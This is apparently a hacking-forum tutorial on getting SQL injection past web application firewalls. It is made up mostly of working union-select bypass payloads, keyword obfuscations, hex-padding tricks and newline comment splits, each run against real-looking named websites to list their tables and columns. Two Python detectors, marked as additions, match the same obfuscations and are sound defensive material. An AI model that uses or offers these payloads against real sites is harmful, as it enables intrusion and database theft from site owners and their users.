☆¸.•*☆ How to know if a Web Application Firewall is on or off ☆*•.¸☆
To find out, we append this statement to the site link:
PHP Code:
or '1'='1' --
If the Web Application Firewall is off, you only see a normal error, like this:
demo
PHP Code:
www.marinaplast.com/page.php?id=13 or '1'='1' --
But if the Web Application Firewall is on, you will see an error like Forbidden or Not Acceptable:
demo
PHP Code:
http://nbnewsxpress.com/news.php?id=28 or '1'='1' --
PHP Code:
http://www.avmaniacs.com/review.php?id=1718 or '1'='1' --
☆¸.•*☆ How to inject a site with the Web Application Firewall on ☆*•.¸☆
I have a site; after I used order+by to find the column count, I found it has 27 columns, like this:
PHP Code:
http://www.avmaniacs.com/review.php?id=-1718 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 --
☆¸.•*☆ How to bypass this error [ Forbidden ] ☆*•.¸☆
You must filter union select.
I collected some strong WAF bypasses for you:
PHP Code:
+union+distinct+select+
+union+distinctROW+select+
+%2F**/+Union/*!select*/
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/uniUNIONon/**/selSELECTect/**/+/*!50000UnIoN*/ /*!50000SeLeCt aLl*/+
+/*!u%6eion*/+/*!se%6cect*/+
%55nion %53elect
union(select(1),2,3)union (select 1111,2222,3333)union (/*!/**/ SeleCT */ 11)
☆¸.•*☆ demo ☆*•.¸☆
PHP Code:
http://www.avmaniacs.com/review.php?id=-1718 +union+distinct+select+ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 --
And we know that when we use the requested query we will get Forbidden:
PHP Code:
http://www.avmaniacs.com/review.php?id=-1718+union+distinct+select+ group_concat(table_name),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 from information_schema.tables where table_schema=database()----
To bypass this, I collected some strong WAF bypasses for the requested query:
☆¸.•*☆ tables ☆*•.¸☆
PHP Code:
group_concat(/*!table_name*/)
PHP Code:
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
☆¸.•*☆ OR ☆*•.¸☆
PHP Code:
/*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA()-- -
☆¸.•*☆ columns ☆*•.¸☆
PHP Code:
group_concat(/*!column_name*/)
PHP Code:
+/*!froM*/ InfORmaTion_scHema.cOlumnS /*!WheRe*/ /*!tAblE_naMe*/=hex table
☆¸.•*☆ OR ☆*•.¸☆
PHP Code:
/*!From*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table
PHP Code:
/*!froM*/ table-- -
☆¸.•*☆ demo ☆*•.¸☆
PHP Code:
http://www.avmaniacs.com/review.php?id=-1718+union+distinct+select+ group_concat(/*!table_name*/),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
Oh, Forbidden, but don't worry: this means the problem is in concat.
OK, let's delete group and bypass concat like this: /*!50000cOnCat*/
☆¸.•*☆ OR ☆*•.¸☆
PHP Code:
/**//*!12345cOnCat*/
/*!50000cOnCat*/(/*!*/)CoNcAt()concat%00() CON%08CAT()
%00CoNcAt()
☆¸.•*☆ demo ☆*•.¸☆
PHP Code:
http://www.avmaniacs.com/review.php?id=-1718+union+distinct+select+/*!50000cOnCat*/(/*!table_name*/),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
Or we can use concat_ws(0x3a3a3a,) like this
PHP Code:
http://www.avmaniacs.com/review.php?id=-1718+union+distinct+select+concat_ws(0x3a3a3a,/*!table_name*/),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
☆¸.•*☆ OR ☆*•.¸☆
PHP Code:
concat(0x3a,,0x3c62723e)/*!concat_ws(0x3a,)*/CONCAT_WS(CHAR(32,58,32),)
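Every string in the union select, tables, columns and concat lists above is the same handful of keywords wrapped in percent-encoding, mixed case, control bytes or MySQL comments, so a filter that matches raw request text misses them while one that canonicalizes first does not. The following is an added example, not part of the original post: a Python normalizer and three match rules run over constructed sample values; the rule names, regexes and samples are assumptions for illustration.

```python
import re
from urllib.parse import unquote

VERSIONED = re.compile(r"/\*!\d{0,5}(.*?)\*/", re.S)  # MySQL executes the body of /*!NNNNN ... */
COMMENT = re.compile(r"/\*.*?\*/", re.S)              # a plain comment only separates tokens
CONTROL = re.compile(r"[\x00-\x08\x0b\x0c\x0e-\x1f\x7f]")

RULES = {  # hypothetical rule names; patterns run on the normalized text only
    "union_select": re.compile(r"\bunion\b\s*(?:all|distinctrow|distinct)?\s*\(?\s*select\b"),
    "schema_enum": re.compile(r"\binformation_schema\s*\.\s*(?:tables|columns)\b"),
    "concat_call": re.compile(r"\b(?:group_concat|concat_ws|concat)\s*\("),
}

def normalize(value):
    """Canonicalize one raw query-string value before any keyword matching."""
    s = value.replace("+", " ")
    for _ in range(3):                      # undo nested percent-encoding, bounded
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    s = CONTROL.sub("", s)                  # drop bytes such as %00 and %08 placed inside keywords
    while VERSIONED.search(s):              # keep the keyword, discard the comment wrapper
        s = VERSIONED.sub(r" \1 ", s)
    s = COMMENT.sub(" ", s)
    return re.sub(r"\s+", " ", s).strip().lower()

def inspect(value):
    """Return the names of the rules that match the normalized value."""
    text = normalize(value)
    return [name for name, rx in RULES.items() if rx.search(text)]

# Constructed sample values, built from the obfuscation forms listed on this page.
SAMPLES = [
    "-1 +union+distinctROW+select+ 1,2,3",
    "-1 /**//*!50000UNION SELECT*//**/ 1,2,3",
    "-1 +/*!u%6eion*/+/*!se%6cect*/+ 1,2,3",
    "-1 %55nion %53elect 1,2,3",
    "-1 union(select(1),2,3)",
    "/*!50000cOnCat*/(/*!table_name*/) /*!From*/+%69nformation_schema./**/tAblES",
    "CON%08CAT(a,b)",
    "13",
    "student union elections",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(inspect(sample), "<-", normalize(sample))
```

Comments nested inside a versioned comment are not unwrapped here; a production normalizer needs to follow the database's own comment grammar.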
☆¸.•*☆ method 2 BoF+Attacks ☆*•.¸☆
We can use the BoF+Attacks query to bypass the Forbidden error, and the 500 Internal Server Error too.
Let's see:
PHP Code:
www.bryansmarine.com/details.php?id=319 union select 1
Now, to skip this 500 Internal Server Error or 500 Forbidden error, we use the BoF+Attacks query:
PHP Code:
+And(select 1)=(select 0x4141414141414141414141414141414141414141414141414141414141414141414141414
14141414141414141414141414141414141414141414141414141414141414141414141414141414
14141414141414141414141414141414141414141414141414141414141414141414141414141414
14141414141414141414141414141414141414141414141414141414141414141414141414141414
14141414141414141414141414141414141414141414141414141414141414141414141414141414
14141414141414141414141414141414141414141414141414141414141414141414141414141414
14141414141414141414141414141414141414141414141414141414141414141414141414141414
14141414141414141414141414141414141414141414141414141414141414141414141414141414
14141414141414141414141414141414141414141414141414141414141414141414141414141414
1414141)+
If this query doesn't work, we can use this query [ 1000 of A ]:
PHP Code:
+and (/*!select*/ 1)=(/*!select*/ 0xAA)+
OK, now we put this query before union select to bypass the error.
☆¸.•*☆ demo ☆*•.¸☆
PHP Code:
www.bryansmarine.com/details.php?id=319+And(select 1)=(select 0x4141414141414141414141414141414141414141414141414141414141414141414141414
14141414141414141414141414141414141414141414141414141414141414141414141414141414
14141414141414141414141414141414141414141414141414141414141414141414141414141414
14141414141414141414141414141414141414141414141414141414141414141414141414141414
14141414141414141414141414141414141414141414141414141414141414141414141414141414
14141414141414141414141414141414141414141414141414141414141414141414141414141414
14141414141414141414141414141414141414141414141414141414141414141414141414141414
14141414141414141414141414141414141414141414141414141414141414141414141414141414
14141414141414141414141414141414141414141414141414141414141414141414141414141414
1414141)+union select 1
Aha, now we have this error:
PHP Code:
Unknown table 'articles' in field list
Anyway, I found the column count: it's 35.
☆¸.•*☆ demo ☆*•.¸☆
PHP Code:
www.bryansmarine.com/details.php?id=319+And(select 1)=(select 0x4141414141414141414141414141414141414141414141414141414141414141414141414
14141414141414141414141414141414141414141414141414141414141414141414141414141414
14141414141414141414141414141414141414141414141414141414141414141414141414141414
14141414141414141414141414141414141414141414141414141414141414141414141414141414
14141414141414141414141414141414141414141414141414141414141414141414141414141414
14141414141414141414141414141414141414141414141414141414141414141414141414141414
14141414141414141414141414141414141414141414141414141414141414141414141414141414
14141414141414141414141414141414141414141414141414141414141414141414141414141414
14141414141414141414141414141414141414141414141414141414141414141414141414141414
1414141)+union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35--
☆¸.•*☆# 400 bad request # thx benzi # ☆*•.¸☆
If we get a 400 Bad Request error like this:
PHP Code:
tibikra.huntscape.lt/highscore/personal.php?name=lauras469' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49 +--+/
It means: Your browser sent a request that this server could not understand.
To bypass this error, we first need to know where the error begins, like this:
PHP Code:
tibikra.huntscape.lt/highscore/personal.php?name=lauras469' union
Nothing happens; no 400 Bad Request error.
PHP Code:
tibikra.huntscape.lt/highscore/personal.php?name=lauras469' union select
Nothing happens; no 400 Bad Request error.
PHP Code:
tibikra.huntscape.lt/highscore/personal.php?name=lauras469' union select 1 +--+/
Nothing happens; no 400 Bad Request error.
PHP Code:
tibikra.huntscape.lt/highscore/personal.php?name=lauras469' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 +--+/
Nothing happens; no 400 Bad Request error.
PHP Code:
tibikra.huntscape.lt/highscore/personal.php?name=lauras469' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 +--+/
Oh, a 400 Bad Request error.
Now we know this error begins from column 19, which is the last one that shows no error. To bypass this error we add --+%0A after the column number, like this:
PHP Code:
19--+%0A,20--+%0A,21--+%0A etc ....
☆¸.•*☆ demo ☆*•.¸☆
PHP Code:
http://tibikra.huntscape.lt/highscore/personal.php?name=lauras469'and false UNION select version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--+%0A,20--+%0A,21--+%0A,22--+%0A,23--+%0A,24--+%0A,25--+%0A,26--+%0A,27--+%0A,28--+%0A,29--+%0A,30--+%0A,31--+%0A,32--+%0A,33--+%0A,34--+%0A,35--+%0A,36--+%0A,37--+%0A,38--+%0A,39--+%0A,40--+%0A,41--+%0A,42--+%0A,43--+%0A,44--+%0A,45--+%0A,46--+%0A,47--+%0A,48--+%0A,49--+
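Both tricks in this part leave a distinctive shape in the decoded parameter value: a hex literal hundreds of digits long, and SQL line comments that are each closed by an encoded newline. The following is an added example, not part of the original post, that flags those shapes in request targets taken from an access log; the thresholds, paths and sample lines are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

HEX_LITERAL = re.compile(r"0x([0-9a-fA-F]+)")
COMMENT_EOL = re.compile(r"--[ \t]*\r?\n")   # "--" comment ended by a decoded %0A

MAX_HEX_DIGITS = 64    # assumption: longer literals are padding, not data
MAX_COMMENT_EOL = 1    # assumption: one "-- <newline>" can be an e-mail signature

def findings(request_target):
    """Return (parameter, reason) pairs for one request target from an access log."""
    out = []
    query = urlsplit(request_target).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        # parse_qsl has already decoded "+" and %XX, so value is what the app receives
        longest = max((len(h) for h in HEX_LITERAL.findall(value)), default=0)
        if longest > MAX_HEX_DIGITS:
            out.append((name, f"hex literal of {longest} digits"))
        breaks = len(COMMENT_EOL.findall(value))
        if breaks > MAX_COMMENT_EOL:
            out.append((name, f"{breaks} line comments closed by a newline"))
    return out

# Constructed request targets (hypothetical paths), shaped like the two demos above.
PADDED = "/item.php?id=319+And(select+1)=(select+0x" + "41" * 500 + ")+union+select+1"
SPLIT = "/score.php?name=x'+union+select+1,2,19--+%0A,20--+%0A,21--+%0A,22--+"
BENIGN = [
    "/item.php?id=13&sep=0x3a3a3a",
    "/note.php?body=regards%0A--+%0Aalice",
]

if __name__ == "__main__":
    for target in [PADDED, SPLIT] + BENIGN:
        print(findings(target), "<-", target[:60])
```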
hackforums.net